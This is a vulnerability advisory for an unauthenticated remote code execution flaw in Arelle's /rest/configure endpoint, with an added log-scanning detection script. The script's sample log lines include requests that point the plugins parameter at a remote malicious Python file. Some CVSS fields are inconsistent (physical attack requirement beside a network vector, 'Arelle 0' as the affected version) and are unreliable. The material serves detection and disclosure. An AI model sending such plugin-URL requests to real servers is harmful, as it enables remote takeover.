Unauthenticated Remote Code Execution in Arelle by Arelle Inc.
CVE-2026-42796

9.2 CRITICAL

Key Information:

Vendor

Arelle

Status
Vendor
CVE Published:
4 May 2026

What is CVE-2026-42796?

Arelle prior to version 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint. The endpoint accepts user-supplied data through the 'plugins' query parameter, which lets an attacker supply a URL pointing to a malicious Python file. Because no authentication or authorization check is performed, the Arelle webserver downloads and executes that code with the same privileges as the Arelle process, posing a significant risk to system integrity and security.
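A detection check for the request pattern the advisory describes, added here as an illustration and not part of the advisory or of Arelle itself: it scans web access-log lines for /rest/configure requests whose 'plugins' parameter carries a remote URL instead of a plugin name. The log lines are constructed; the Common Log Format layout and the '|' / ',' plugin-list separators are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (Common Log Format); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = """\
10.0.0.5 - - [04/May/2026:10:00:01 +0000] "GET /rest/configure?plugins=validate/EFM HTTP/1.1" 200 512
10.0.0.7 - - [04/May/2026:10:00:02 +0000] "GET /rest/configure?plugins=http%3A%2F%2F203.0.113.9%2Fevil.py HTTP/1.1" 200 512
10.0.0.8 - - [04/May/2026:10:00:03 +0000] "GET /rest/xbrl/view?file=report.xhtml HTTP/1.1" 200 4096
10.0.0.9 - - [04/May/2026:10:00:04 +0000] "POST /rest/configure?plugins=validate/EFM|https://203.0.113.9/x.py HTTP/1.1" 200 512
"""

# Extracts method and request target from the quoted request line of a CLF entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
REMOTE_SCHEMES = ("http", "https", "ftp")


def remote_plugin_refs(target):
    """Return the 'plugins' entries of a /rest/configure request that are remote URLs."""
    parts = urlsplit(target)
    if parts.path != "/rest/configure":
        return []
    hits = []
    # parse_qs already percent-decodes values, so no second decode is applied.
    for value in parse_qs(parts.query).get("plugins", []):
        # Assumption: list entries are separated by '|' or ','.
        for entry in re.split(r"[|,]", value):
            entry = entry.strip()
            scheme = entry.split(":", 1)[0].lower() if ":" in entry else ""
            if scheme in REMOTE_SCHEMES:
                hits.append(entry)
    return hits


def scan_log(text):
    """Return (client_ip, remote plugin refs) for every log line that should be flagged."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        refs = remote_plugin_refs(m.group("target"))
        if refs:
            findings.append((line.split(" ", 1)[0], refs))
    return findings


if __name__ == "__main__":
    for ip, refs in scan_log(SAMPLE_LOG):
        print(f"{ip}: remote plugin reference(s) on /rest/configure: {refs}")
```

Requests that match should be blocked at the reverse proxy or reviewed as part of upgrading to 2.39.10 or later.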

Affected Version(s)

Arelle 0

References

CVSS V4

Score:
9.2
Severity:
CRITICAL
Confidentiality:
High
Integrity:
High
Availability:
High
Attack Vector:
Network
Attack Complexity:
Low
Attack Required:
Physical
Privileges Required:
Undefined
User Interaction:
None

Timeline

  • Vulnerability published

  • Vulnerability Reserved

Credit

Mobasi Security Team